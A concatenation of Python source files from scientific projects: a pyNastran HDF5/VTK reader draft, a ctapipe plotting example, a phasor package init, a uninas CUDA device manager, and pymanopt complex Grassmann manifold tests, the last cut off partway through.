#udomains = np.unique(DOMAIN)
#all_data = np.stack([X, Y, Z, RX, RY, RZ], axis=1, out=None)
DOMAIN_ID = domains_df['ID']
grouped_df = break_domain_by_case(domains_df, INDEX_DOMAIN)
subcases = geom_model.subcases
for tuplei in grouped_df:
indexi, dfi = tuplei
DOMAINs = dfi['ID']
#print(indexi)
#print(dfi)
#print('---------------------')
idomain = np.searchsorted(DOMAINs, INDEX_DOMAIN)
exists = idomain < len(INDEX_DOMAIN)
if not np.all(exists):
if np.any(exists):
raise RuntimeError(idomain)
continue
#idomain = []
#for domain, position, length in zip(INDEX_DOMAIN, INDEX_POSITION, INDEX_LENGTH):
#idomain = (DOMAIN_ID == domain)
#mycase = domains_df.loc[idomain]
position = INDEX_POSITION[idomain]
length = INDEX_LENGTH[idomain]
# ID=1; Analysis=0 -> eigenvalues
# ID SUBCASE STEP ANALYSIS TIME_FREQ_EIGR EIGI MODE DESIGN_CYCLE RANDOM SE AFPM TRMC INSTANCE MODULE
# 0 1 0 0 0 0.000000e+00 0.0 0 0 0 0 0 0 0 0
# 1 2 1 0 2 -3.087735e-10 0.0 1 0 0 0 0 0 0 0
# 2 3 1 0 2 -2.082743e-10 0.0 2 0 0 0 0 0 0 0
# 3 4 1 0 2 -1.514309e-10 0.0 3 0 0 0 0 0 0 0
subcase = dfi['SUBCASE']# .values[0]
analysis_code = dfi['ANALYSIS']
eigr = dfi['TIME_FREQ_EIGR']# .values[0]
eigi = dfi['EIGI']
mode = dfi['MODE']# .values[0]
#SEID Integer, default=0 Super element id of the data block
#AFPMID Integer, default=0 Acoustic field point mesh id
#TRIMID Trim id, default=0 Trim component id
step = dfi['STEP'].values[0]
design_cycle = dfi['DESIGN_CYCLE'].values[0]
random = dfi['RANDOM'].values[0]
se = dfi['SE'].values[0]
afpm = dfi['AFPM'].values[0]
trmc = dfi['TRMC'].values[0]
inst = dfi['INSTANCE'].values[0]
module = dfi['MODULE'].values[0]
assert step in [0, 1], step
#assert design_cycle == 0, design_cycle
assert random == 0, random
assert se == 0, se
assert afpm == 0, afpm
assert trmc == 0, trmc
assert inst == 0, inst
assert module == 0, module
iresults = np.full(len(idomain), np.nan, dtype='int32')
is_freq = np.abs(eigr).max() != 0 or np.abs(eigi).max() != 0
is_modes = mode.max() != 0
step_type = ''
for itime, subcasei, analysis_codei, modei, eigri, eigii, idomaini, positioni, lengthi in zip(count(), subcase, analysis_code, mode, eigr, eigi, idomain, position, length):
if subcasei in subcases:
subcase = subcases[subcasei]
if 'ANALYSIS' in subcase:
analysisi = subcase['ANALYSIS'][0]
step_type = f' ({analysisi})'
else:
print('preload step?')
else:
print(f'what is subcase {subcasei}?')
i0 = positioni
i1 = positioni + lengthi
#name = f'{basename}_subcase={subcasei:d}; mode={modei:d}; freq={eigri}'
basename = f'{basename_orig}'
name = _get_eigenvector_name(basename, subcasei, analysis_codei, modei, eigri, eigii,
is_modes, is_freq)
#name = f'{basename}: subcase={subcasei:d}; mode={modei:d}; freq={eigri}'
print(name)
#print(itime, domain, positioni, lengthi)
# make it so we can determine the other "times"
iresults[itime] = iresult
_domain = DOMAIN[i0]
__domain = _domain # # DOMAIN[i0:i1]
_nids = NID[i0:i1]
assert len(_nids) == len(ids)
if solver == 'msc':
results[iresult] = RealVectorTable(
name, itime, iresult, iresults,
_domain, position, length,
_nids,
TX[i0:i1], TY[i0:i1], TZ[i0:i1],
RX[i0:i1], RY[i0:i1], RZ[i0:i1],
_domain, 'node')
elif solver == 'optistruct':
results[iresult] = RealVectorTableOptistruct(
name, itime, iresult, iresults,
_domain, position, length,
_nids,
VALUE[i0:i1, :],
#VALUE[i0:i1, 3:],
#VALUE[i0:i1, :3],
_domain, location='node')
else:
raise NotImplementedError(solver)
iresult += 1
return iresult
def load_eigenvector_complex(basename: str,
iresult: int,
results: Dict[int, Function],
domains_df: pd.DataFrame,
group: h5py._hl.dataset.Dataset,
index: h5py._hl.dataset.Dataset,
ids: np.ndarray,
geom_model: BDF,
model: OP2,
subcases: Optional[List[int]]=None) -> int:
basename += ' (complex)'
# TODO: check real/imaginary or magnitude/phase
#'ID', 'X', 'Y', 'Z', 'RX', 'RY', 'RZ', 'DOMAIN_ID',
#'DOMAIN_ID', 'POSITION', 'LENGTH'
INDEX_DOMAIN = index['DOMAIN_ID']
INDEX_POSITION = index['POSITION']
INDEX_LENGTH = index['LENGTH']
NID = group['ID']
names = group.dtype.names
    if 'XR' in names:
TX = group['XR'] + group['XI'] * 1j
TY = group['YR'] + group['YI'] * 1j
TZ = group['ZR'] + group['ZI'] * 1j
RX = group['RXR'] + group['RXI'] * 1j
RY = group['RYR'] + group['RYI'] * 1j
RZ = group['RZR'] + group['RZI'] * 1j
solver = 'msc'
#elif 'VALUE' in names:
#asdf
else:
raise NotImplementedError(str(names))
DOMAIN = group['DOMAIN_ID']
# what are the subcases...
#udomains = np.unique(DOMAIN)
#all_data = np.stack([X, Y, Z, RX, RY, RZ], axis=1, out=None)
DOMAIN_ID = domains_df['ID']
grouped_df = break_domain_by_case(domains_df, INDEX_DOMAIN)
for tuplei in grouped_df:
indexi, dfi = tuplei
DOMAINs = dfi['ID']
#print(indexi)
#print(dfi)
#print('---------------------')
idomain = np.searchsorted(DOMAINs, INDEX_DOMAIN)
exists = idomain < len(INDEX_DOMAIN)
if not np.all(exists):
if np.any(exists):
raise RuntimeError(idomain)
continue
#idomain = []
#for domain, position, length in zip(INDEX_DOMAIN, INDEX_POSITION, INDEX_LENGTH):
#idomain = (DOMAIN_ID == domain)
#mycase = domains_df.loc[idomain]
position = INDEX_POSITION[idomain]
length = INDEX_LENGTH[idomain]
# ID=1; Analysis=0 -> eigenvalues
# ID SUBCASE STEP ANALYSIS TIME_FREQ_EIGR EIGI MODE DESIGN_CYCLE RANDOM SE AFPM TRMC INSTANCE MODULE
# 0 1 0 0 0 0.000000e+00 0.0 0 0 0 0 0 0 0 0
# 1 2 1 0 2 -3.087735e-10 0.0 1 0 0 0 0 0 0 0
# 2 3 1 0 2 -2.082743e-10 0.0 2 0 0 0 0 0 0 0
# 3 4 1 0 2 -1.514309e-10 0.0 3 0 0 0 0 0 0 0
subcase = dfi['SUBCASE']
analysis_code = dfi['ANALYSIS']
eigr = dfi['TIME_FREQ_EIGR']
eigi = dfi['EIGI']
mode = dfi['MODE']
step = dfi['STEP'].values[0]
design_cycle = dfi['DESIGN_CYCLE'].values[0]
random = dfi['RANDOM'].values[0]
se = dfi['SE'].values[0]
afpm = dfi['AFPM'].values[0]
trmc = dfi['TRMC'].values[0]
inst = dfi['INSTANCE'].values[0]
module = dfi['MODULE'].values[0]
assert step in [0, 1], step
assert design_cycle == 0, design_cycle
assert random == 0, random
assert se == 0, se
assert afpm == 0, afpm
assert trmc == 0, trmc
assert inst == 0, inst
assert module == 0, module
iresults = np.full(len(idomain), np.nan, dtype='int32')
is_freq = np.abs(eigr).max() != 0 or np.abs(eigi).max() != 0
for itime, subcasei, analysis_codei, modei, eigri, eigii, idomaini, positioni, lengthi in zip(count(), subcase, analysis_code, mode, eigr, eigi, idomain, position, length):
#for itime, idomaini, positioni, lengthi in zip(count(), idomain, position, length):
i0 = positioni
i1 = positioni + lengthi
name = _get_name(basename, is_freq, subcasei, analysis_codei, modei, eigri, eigii)
print(name)
#print(itime, domain, positioni, lengthi)
# make it so we can determine the other "times"
iresults[itime] = iresult
_domain = DOMAIN[i0]
if solver == 'msc':
results[iresult] = RealVectorTable(
name, itime, iresult, iresults,
_domain, position, length,
NID[i0:i1],
TX[i0:i1], TY[i0:i1], TZ[i0:i1],
RX[i0:i1], RY[i0:i1], RZ[i0:i1],
DOMAIN[i0:i1], location='node')
elif solver == 'optistruct':
results[iresult] = RealVectorTableOptistruct(
name, itime, iresult, iresults,
_domain, position, length,
NID[i0:i1],
VALUE[i0:i1, :],
#VALUE[i0:i1, 3:],
#VALUE[i0:i1, :3],
DOMAIN[i0:i1], location='node')
else:
raise NotImplementedError(solver)
iresult += 1
return iresult
def _get_eigenvector_name(basename, subcasei, analysis_codei, modei, eigri, eigii,
is_modes, is_freq):
if modei == 0: # static?
if is_freq:
name = f'{basename}: subcase={subcasei:d}; freq={eigri:g}'
else:
name = f'{basename}: subcase={subcasei:d}'
elif analysis_codei == 0: # ???
name = f'{basename}: subcase={subcasei:d}; static? mode={modei:d}; eigr={eigri:g}; eigi={eigii:g}'
elif analysis_codei == 2: # modes?
if is_modes:
name = f'{basename}: subcase={subcasei:d}; mode={modei:d}; freq={eigri:g}'
else:
raise NotImplementedError(analysis_codei)
elif analysis_codei == 8: # buckling (pre?/post?)
# we left off eigr/eigi...(eigr=0; eigi!=0)
name = f'{basename}: subcase={subcasei:d}; buckling mode={modei:d}; load_factor={eigri:g}; eigi={eigii:g}'
elif analysis_codei == 9: # loadstep?
# we left off eigr/eigi...(eigr=0; eigi!=0)
name = f'{basename}: subcase={subcasei:d}; loadstep? mode={modei:d}; eigi={eigii:g}'
else:
raise NotImplementedError(analysis_codei)
return name
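# Example of the names this helper produces (illustrative arguments):
#   _get_eigenvector_name('Eigenvector (real)', 1, 2, 3, 42.5, 0.0, True, True)
#   -> 'Eigenvector (real): subcase=1; mode=3; freq=42.5'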
def _get_name(basename: str, is_freq: bool, subcasei, analysis_codei, modei, eigri, eigii):
if modei == 0: # static
if is_freq:
name = f'{basename}: subcase={subcasei:d}; freq={eigri:g}; eigi={eigii:g}'
else:
name = f'{basename}: subcase={subcasei:d}'
raise NotImplementedError(analysis_codei)
elif analysis_codei == 9:
# we left off eigr/eigi...(eigr=0; eigi!=0)
name = f'{basename}: subcase={subcasei:d}; loadstep? mode={modei:d} eigi={eigii:g}'
#raise NotImplementedError(analysis_codei)
else:
raise NotImplementedError(analysis_codei)
#name = f'{basename}: subcase={subcasei:d}; mode={modei:d}; freq={eigri}'
#name = f'Eigenvector_subcase={subcasei:d}; mode={modei:d}; freq={eigri:g} eigi={eigii:}'
return name
class vtkNastranReader(vtk.vtkPolyDataAlgorithm):
"""
References
----------
https://kitware.github.io/paraview-docs/latest/python/paraview.simple.VisItNASTRANReader.html
https://github.com/Kitware/VTK/blob/master/IO/Geometry/vtkSTLReader.cxx
https://vtk.org/Wiki/VTK/Tutorials/New_Pipeline
https://vtk.org/Wiki/ParaView/Examples/Plugins/Reader
https://vtk.org/Wiki/VTK/Examples/Python/STLReader
https://gitlab.kitware.com/paraview/paraview/-/blob/master/Examples/Plugins/PythonAlgorithm/PythonAlgorithmExamples.py
https://gitlab.kitware.com/paraview/visitbridge/-/blob/master/databases/readers/NASTRAN/NASTRANPluginInfo.C
https://vtk.org/Wiki/VisIt_Database_Bridge
https://blog.kitware.com/developing-hdf5-readers-using-vtkpythonalgorithm/
"""
def __init__(self):
vtk.vtkPolyDataAlgorithm.__init__(self)
self.filename = None
self.model = pyNastranH5()
def SetFileName(self, char_filename: str):
self.filename = char_filename
self.model.read_h5_nastran(self.filename)
def GetFileName(self) -> str:
return self.filename
def IsFilePolyData(self) -> int:
return 0
def IsFileStructuredGrid(self) -> int:
return 0
def IsFileUnstructuredGrid(self) -> int:
return 1
def IsFileRectilinearGrid(self) -> int:
return 0
def RequestData(unused_request: vtk.vtkInformation,
unused_inputVector: vtk.vtkInformationVector,
unused_outputVector: vtk.vtkInformationVector) -> int:
#vtkInformation* outInfo = outputVector->GetInformationObject(0)
#vtkPolyData* output = vtkPolyData::SafeDownCast(outInfo->Get(vtkDataObject::DATA_OBJECT()))
## All of the data in the first piece.
#if (outInfo->Get(vtkStreamingDemandDrivenPipeline::UPDATE_PIECE_NUMBER()) > 0):
#return 0
raise NotImplementedError()
def GetSTLFileType(filename: str) -> int:
ft = vtk.vtksys.SystemTools.DetectFileType(filename)
#ft = vtksys::SystemTools::DetectFileType(filename)
#vtksys::SystemTools::FileTypeEnum
if ft == 0: # vtksys::SystemTools::FileTypeBinary:
return VTK_BINARY
elif ft == 1: # vtksys::SystemTools::FileTypeText:
return VTK_ASCII
        elif ft == 2: # vtksys::SystemTools::FileTypeUnknown:
vtkWarningMacro("File type not recognized; attempting binary")
return VTK_BINARY
else:
raise RuntimeError("Case not handled, file type is %s" % ft)
        return VTK_BINARY  # should not happen
def PrintSelf(file_obj, indent: vtk.vtkIndent):
self.Superclass.PrintSelf(file_obj, indent)
msg = indent + "Merging: " + ("On\n" if self.Merging else "Off\n")
msg += indent + "ScalarTags: " + ("On\n" if self.ScalarTags else "Off\n")
msg += indent + "Locator: "
file_obj.write(msg)
if self.Locator:
            pass  # TODO: port self.Locator.PrintSelf(...) from the C++ implementation
#self.Locator.PrintSelf(os << endl, indent.GetNextIndent());
else:
print('(none)\n')
def ProcessRequest(request: vtk.vtkInformation,
inputVector: vtk.vtkInformationVector,
outputVector: vtk.vtkInformationVector) -> int:
raise NotImplementedError()
def ReadHeader(char_fname: str='') -> int:
"""Read the header of a vtk data file. More..."""
raise NotImplementedError()
def ReadCellData(ds: vtk.vtkDataSet, numCells: vtk.vtkIdTypeArray):
"""Read the cell data of a vtk data file. More..."""
raise NotImplementedError()
def ReadPointData(ds: vtk.vtkDataSet, numPts: vtk.vtkIdTypeArray) -> int:
"""Read the point data of a vtk data file. More..."""
raise NotImplementedError()
def ReadPointCoordinates(vtkPointSet_ps, numCells: vtk.vtkIdTypeArray) -> int:
"""Read point coordinates. More..."""
raise NotImplementedError()
def ReadPointCoordinates(g: vtk.vtkGraph, numPts: vtk.vtkIdTypeArray) -> int:
"""Read point coordinates. More..."""
raise NotImplementedError()
def ReadVertexData(g: vtk.vtkGraph, numVertices: vtk.vtkIdTypeArray) -> int:
"""Read the vertex data of a vtk data file. More..."""
raise NotImplementedError()
def ReadEdgeData(g: vtk.vtkGraph, numEdges: vtk.vtkIdTypeArray) -> int:
"""Read the edge data of a vtk data file. More..."""
raise NotImplementedError()
def ReadRowData(t: vtk.vtkTable, numEdges: vtk.vtkIdTypeArray) -> int:
"""Read the row data of a vtk data file. More..."""
raise NotImplementedError()
def ReadCells(vtkCellArray, cellArray) -> int:
raise NotImplementedError()
# ------------------------------------------------------------
# Data Descriptors
def CellArrayStatus(self):
"""This property lists which cell-centered arrays to read."""
raise NotImplementedError()
#def FileName(self):
#"""The list of files to be read by the reader."""
def MaterialStatus(self):
"""Select the materials to be loaded from the dataset, if any."""
raise NotImplementedError()
def MeshStatus(self):
"""Select the meshes to be loaded from the dataset, if any."""
raise NotImplementedError()
def PointArrayStatus(self):
"""This property lists which point-centered arrays to read."""
raise NotImplementedError()
def TimestepValues(self):
"""Available timestep values."""
raise NotImplementedError()
# ------------------------------------------------------------
# Data Descriptors
def CellData(self):
"""Returns cell data information"""
raise NotImplementedError()
def FieldData(self):
"""Returns field data information"""
raise NotImplementedError()
def PointData(self):
"""Returns point data information"""
raise NotImplementedError()
# ------------------------------------------------------------
# Methods
def FileNameChanged(self):
"""Called when the filename of a source proxy is changed."""
raise NotImplementedError()
def GetCellDataInformation(self):
"""Returns the associated cell data information."""
raise NotImplementedError()
def GetDataInformation(self, idx=None):
"""This method returns a DataInformation wrapper around a vtkPVDataInformation"""
raise NotImplementedError()
def GetFieldDataInformation(self):
"""Returns the associated cell data information."""
raise NotImplementedError()
def GetPointDataInformation(self):
"""Returns the associated point data information."""
raise NotImplementedError()
def UpdatePipeline(self, time=None):
"""This method updates the server-side VTK pipeline and the associated data information. Make sure to update a source to validate the output meta-data."""
raise NotImplementedError()
def UpdatePipelineInformation(self):
"""This method updates the meta-data of the server-side VTK pipeline and the associated information properties"""
raise NotImplementedError()
def run():
reader = vtk.vtkDataSetReader()
reader.SetFileName("bunny-0.1.vtk")
reader.ReadAllVectorsOn()
reader.ReadAllScalarsOn()
reader.Update()
data = reader.GetOutput()
calc = vtk.vtkArrayCalculator()
calc.SetInputData(data)
calc.SetFunction("5")
calc.SetResultArrayName("MyResults")
calc.Update()
# Gives: AttributeError: 'NoneType' object has no attribute 'GetPointData'
#print(calc.GetPolyDataOutput().GetPointData().GetArray("MyResults").getValue(10))
#writer = vtk.vtkUnstructuredGridWriter()
#writer.SetInputData(data)
#writer.SetFileName("Output.vtk")
#writer.Write()
def run2(hdf5_filename: str):
"""
https://github.com/Kitware/VTK/blob/master/IO/Geometry/vtkSTLReader.cxx
https://vtk.org/Wiki/VTK/Examples/Python/STLReader
"""
#vtkSTLReader
reader = vtkNastranReader()
print(reader)
reader.SetFileName(hdf5_filename)
mapper = vtk.vtkPolyDataMapper()
#if vtk.VTK_MAJOR_VERSION <= 5:
#mapper.SetInput(reader.GetOutput())
#else:
mapper.SetInputConnection(reader.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# Create a rendering window and renderer
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
# Create a renderwindowinteractor
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Assign actor to the renderer
ren.AddActor(actor)
# Enable user interface interactor
iren.Initialize()
renWin.Render()
iren.Start()
if __name__ == '__main__':
# tasks
# - figure out nastran hdf5
# - done
# - figure out how to make a vtk reader
# -
# day 1: 3.5
# day 2: 7
# day 3: 3
# day 4: 7
# day 5: 3
# 1/1: day 6: 6
# ---------------------> 29.5 (for basic hdf5 and )
# 1/3: 5 # gui works
#
#
# tasks:
# - superelements?
# - solutions?
# - spoints
# - elements
# - is there enough RAM to store objects?
# - representative model
# - what are your goals once in Paraview/Paravis
model = pyNastranH5()
h5_filenames = [
r'C:\NASA\m4\formats\git\pyNastran\models\sol_101_elements\buckling_solid_shell_bar.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\sol_101_elements\buckling2_solid_shell_bar.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\sol_101_elements\buckling_solid_shell_bar.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\aero\2_mode_flutter\0012_flutter.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\aero\aerobeam.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\aero\cpmopt.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\msc\6+element-nastran-sol103.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\msc\mode_echo.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\msc\ex1.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\sol_101_elements\static_solid_shell_bar.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\static_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\modes_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\time_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\modes_complex_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\freq_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\freq_elements2.h5',
##r'C:\NASA\m4\formats\git\pyNastran\models\elements\loadstep_elements.h5', # no nonlinear examples
r'C:\NASA\m4\formats\git\pyNastran\models\elements\time_thermal_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\bwb\bwb_saero_saved.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\sol200\d200obus.h5',
]
for h5_filename in h5_filenames:
model.read_h5_nastran(h5_filename)
#model = pyNastranH5()
#model.read_h5_nastran(h5_filename)
#run2(h5_filename)
| 49.745736
| 188
| 0.477794
|
9cb6e373edd0c9d596ac328c1e673f344431b351
| 358
|
py
|
Python
|
docs/ctapipe_api/instrument/camerageometry_example.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | null | null | null |
docs/ctapipe_api/instrument/camerageometry_example.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | null | null | null |
docs/ctapipe_api/instrument/camerageometry_example.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | 1
|
2020-05-16T10:23:51.000Z
|
2020-05-16T10:23:51.000Z
|
from ctapipe.instrument import CameraGeometry
from matplotlib import pyplot as plt
geom = CameraGeometry.from_name("LSTCam")
plt.figure(figsize=(8, 3))
plt.subplot(1, 2, 1)
plt.imshow(geom.neighbor_matrix, origin="lower")
plt.title("Pixel Neighbor Matrix")
plt.subplot(1, 2, 2)
plt.scatter(geom.pix_x, geom.pix_y)
plt.title("Pixel Positions")
plt.show()
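# A hedged follow-up sketch (added for illustration, assuming the same CameraGeometry
# object as above): a quick textual summary of the geometry complements the two plots
# without introducing any extra dependencies.
print(geom)
print("number of pixels:", len(geom.pix_x))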
| 22.375
| 48
| 0.759777
|
7a52ccbba91db29994f48398dfd5a42eb2c8e99a
| 774
|
py
|
Python
|
phasor/base/__init__.py
|
mccullerlp/OpenLoop
|
fe86dc6dec3740d4b6be6b88d8eef8566e2aa78d
|
[
"Apache-2.0"
] | 5
|
2018-02-28T00:43:37.000Z
|
2020-01-21T11:39:15.000Z
|
phasor/base/__init__.py
|
mccullerlp/OpenLoop
|
fe86dc6dec3740d4b6be6b88d8eef8566e2aa78d
|
[
"Apache-2.0"
] | 1
|
2019-09-07T23:15:43.000Z
|
2019-09-07T23:15:43.000Z
|
phasor/base/__init__.py
|
mccullerlp/OpenLoop
|
fe86dc6dec3740d4b6be6b88d8eef8566e2aa78d
|
[
"Apache-2.0"
] | 1
|
2020-08-21T04:42:09.000Z
|
2020-08-21T04:42:09.000Z
|
# -*- coding: utf-8 -*-
"""
"""
from __future__ import division, print_function, unicode_literals
#from phasor.utilities.print import print
from .bases import (
NoiseBase,
CouplerBase,
FrequencyBase,
Element,
RootElement,
SystemElementBase,
PTREE_ASSIGN,
)
from .ports import (
ElementKey,
ClassicalFreqKey,
)
from .frequency import (
Frequency,
)
from .utilities import (
type_test,
)
from .multi_unit_args import (
generate_refval_attribute,
unitless_refval_attribute,
arbunit_refval_attribute,
)
from .pint import (
ureg,
mag1_units,
)
from .simple_units import (
SimpleUnitfulGroup,
ElementRefValue,
)
from .dictionary_keys import (
DictKey,
FrequencyKey,
)
#from .units import ()
| 14.884615
| 65
| 0.692506
|
934cacd93f0211ff70da261c08cd522beccb8ada
| 2,997
|
py
|
Python
|
uninas/training/devices/cuda.py
|
cogsys-tuebingen/uninas
|
06729b9cf517ec416fb798ae387c5bd9c3a278ac
|
[
"MIT"
] | 18
|
2020-11-22T16:03:08.000Z
|
2022-03-15T12:11:46.000Z
|
uninas/training/devices/cuda.py
|
cogsys-tuebingen/uninas
|
06729b9cf517ec416fb798ae387c5bd9c3a278ac
|
[
"MIT"
] | 2
|
2022-01-04T08:10:17.000Z
|
2022-01-05T08:13:14.000Z
|
uninas/training/devices/cuda.py
|
cogsys-tuebingen/uninas
|
06729b9cf517ec416fb798ae387c5bd9c3a278ac
|
[
"MIT"
] | 6
|
2021-03-08T07:08:52.000Z
|
2022-02-24T12:00:43.000Z
|
import GPUtil
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.nn.parallel.scatter_gather import scatter
from uninas.training.devices.abstract import AbstractDevicesManager, AbstractDeviceMover, TensorOrList
from uninas.utils.args import Argument
from uninas.register import Register
class CudaDeviceMover(AbstractDeviceMover):
"""
handle data flow to specific CUDA devices
"""
def empty_cache(self):
"""
empty the cache
"""
torch.cuda.empty_cache()
def _synchronize(self, indices: [int]):
""" make sure all operations are complete """
for i in indices:
torch.cuda.synchronize(i)
def get_usage_dict(self, log_all=False) -> dict:
""" return a dict that logs the usage of the device(s) """
dct = {}
for gpu in GPUtil.getGPUs():
if gpu.id in self._original_indices:
if log_all:
dct['cuda/%d/%s' % (gpu.id, 'memoryTotal')] = gpu.memoryTotal
dct['cuda/%d/%s' % (gpu.id, 'memoryUsed')] = gpu.memoryUsed
dct['cuda/%d/%s' % (gpu.id, 'memoryFree')] = gpu.memoryFree
dct['cuda/%d/%s' % (gpu.id, 'memoryUtil')] = gpu.memoryUtil
return dct
def move_module(self, module: nn.Module) -> nn.Module:
""" move module to the assigned devices """
assert self.get_num_devices() == 1
return module.cuda(device=self.indices[0])
def _move(self, t: TensorOrList) -> TensorOrList:
""" move (nested) tensors to the assigned devices """
return scatter(t, target_gpus=self.indices)[0]
@Register.devices_manager()
class CudaDevicesManager(AbstractDevicesManager):
"""
manage allocation/de-allocation of CUDA devices
"""
_mover_cls = CudaDeviceMover
def __init__(self, seed: int, is_deterministic: bool, num_devices: int,
use_cudnn: bool, use_cudnn_benchmark: bool):
if num_devices < 0:
num_devices = torch.cuda.device_count()
super().__init__(seed, is_deterministic, num_devices)
assert torch.cuda.device_count() >= num_devices,\
"Only %d devices available on the system, requesting %d" % (torch.cuda.device_count(), num_devices)
if num_devices > 0:
torch.cuda.manual_seed_all(seed)
cudnn.set_flags(_enabled=use_cudnn,
_benchmark=use_cudnn_benchmark and not is_deterministic,
_deterministic=is_deterministic)
@classmethod
def args_to_add(cls, index=None) -> [Argument]:
""" list arguments to add to argparse when this class (or a child class) is chosen """
return super().args_to_add(index) + [
Argument('use_cudnn', default='True', type=str, help='try using cudnn', is_bool=True),
Argument('use_cudnn_benchmark', default='True', type=str, help='use cudnn benchmark', is_bool=True),
]
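# A hedged, illustrative sketch (not part of the original module): CudaDeviceMover._move
# relies on torch's scatter helper to push tensors onto its CUDA devices. The snippet
# below mirrors that call directly and is guarded so it is a no-op without a GPU.
if __name__ == '__main__':
    if torch.cuda.is_available():
        batch = torch.randn(4, 3)
        moved = scatter(batch, target_gpus=[0])[0]  # same call used by CudaDeviceMover._move
        print('moved batch to', moved.device)
    else:
        print('no CUDA device available; skipping the scatter demo')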
| 39.434211
| 112
| 0.630631
|
8863c965ed051e622c66fdce999024d487eb66ca
| 7,497
|
py
|
Python
|
tests/test_manifolds/test_complex_grassmann.py
|
captain-pool/pymanopt
|
df94ab9e03b5fa3041668defe995d93b8715a6d7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_manifolds/test_complex_grassmann.py
|
captain-pool/pymanopt
|
df94ab9e03b5fa3041668defe995d93b8715a6d7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_manifolds/test_complex_grassmann.py
|
captain-pool/pymanopt
|
df94ab9e03b5fa3041668defe995d93b8715a6d7
|
[
"BSD-3-Clause"
] | null | null | null |
import autograd.numpy as np
from numpy import linalg as la
from numpy import random as rnd
from numpy import testing as np_testing
from pymanopt.manifolds import ComplexGrassmann
# from pymanopt.tools import testing
from pymanopt.tools.multi import multieye, multihconj, multiprod, multisym
from .._test import TestCase
class TestSingleComplexGrassmannManifold(TestCase):
def setUp(self):
self.m = m = 5
self.n = n = 2
self.k = k = 1
self.man = ComplexGrassmann(m, n, k=k)
self.proj = lambda x, u: u - x @ x.T @ u
def test_inner(self):
X = self.man.rand()
G = self.man.randvec(X)
H = self.man.randvec(X)
np_testing.assert_almost_equal(
np.real(np.trace(np.conjugate(G.T) @ H)), self.man.inner(X, G, H)
)
assert np.isreal(self.man.inner(X, G, H))
def test_proj(self):
# Test proj(proj(X)) == proj(X)
# and proj(X) belongs to the horizontal space of Stiefel
X = self.man.rand()
U = rnd.randn(self.m, self.n) + 1j * rnd.randn(self.m, self.n)
proj_U = self.man.proj(X, U)
proj_proj_U = self.man.proj(X, proj_U)
np_testing.assert_allclose(proj_U, proj_proj_U)
np_testing.assert_allclose(
multiprod(multihconj(X), proj_U),
np.zeros((self.n, self.n)),
atol=1e-10,
)
def test_norm(self):
X = self.man.rand()
U = self.man.randvec(X)
np_testing.assert_almost_equal(
np.trace(np.conjugate(U.T) @ U), self.man.norm(X, U)
)
assert np.isreal(self.man.norm(X, U))
def test_rand(self):
# Just make sure that things generated are on the manifold
# and that if you generate two they are not equal.
# Test also that matrices are complex.
X = self.man.rand()
np_testing.assert_allclose(
multiprod(multihconj(X), X), np.eye(self.n), atol=1e-10
)
Y = self.man.rand()
assert la.norm(X - Y) > 1e-6
assert np.iscomplex(X).all()
def test_randvec(self):
# Just make sure that things generated are on the horizontal space of
# complex Stiefel manifold
# and that if you generate two they are not equal.
# Test also that matrices are complex.
X = self.man.rand()
G = self.man.randvec(X)
np_testing.assert_allclose(
multiprod(multihconj(X), G), np.zeros((self.n, self.n)), atol=1e-10
)
H = self.man.randvec(X)
assert la.norm(G - H) > 1e-6
assert np.iscomplex(G).all()
def test_dist(self):
X = self.man.rand()
Y = self.man.rand()
np_testing.assert_almost_equal(
self.man.norm(X, self.man.log(X, Y)), self.man.dist(X, Y)
)
def test_exp_log_inverse(self):
X = self.man.rand()
Y = self.man.rand()
U = self.man.log(X, Y)
Z = self.man.exp(X, U)
np_testing.assert_almost_equal(0, self.man.dist(Y, Z), decimal=5)
def test_log_exp_inverse(self):
X = self.man.rand()
U = self.man.randvec(X)
Y = self.man.exp(X, U)
V = self.man.log(X, Y)
# Check that the manifold difference between the tangent vectors u and
# v is 0
np_testing.assert_almost_equal(0, self.man.norm(X, U - V))
def test_retr(self):
# Test that the result is on the manifold and that for small
# tangent vectors it has little effect.
x = self.man.rand()
u = self.man.randvec(x)
xretru = self.man.retr(x, u)
np_testing.assert_allclose(
multiprod(multihconj(xretru), xretru), np.eye(self.n), atol=1e-10
)
u = u * 1e-6
xretru = self.man.retr(x, u)
np_testing.assert_allclose(xretru, x + u)
class TestMultiComplexGrassmannManifold(TestCase):
def setUp(self):
self.m = m = 5
self.n = n = 2
self.k = k = 3
self.man = ComplexGrassmann(m, n, k=k)
def test_dim(self):
assert self.man.dim == self.k * 2 * (self.m * self.n - self.n ** 2)
def test_typicaldist(self):
np_testing.assert_almost_equal(
self.man.typicaldist, np.sqrt(self.n * self.k)
)
def test_inner(self):
X = self.man.rand()
G = self.man.randvec(X)
H = self.man.randvec(X)
np_testing.assert_allclose(
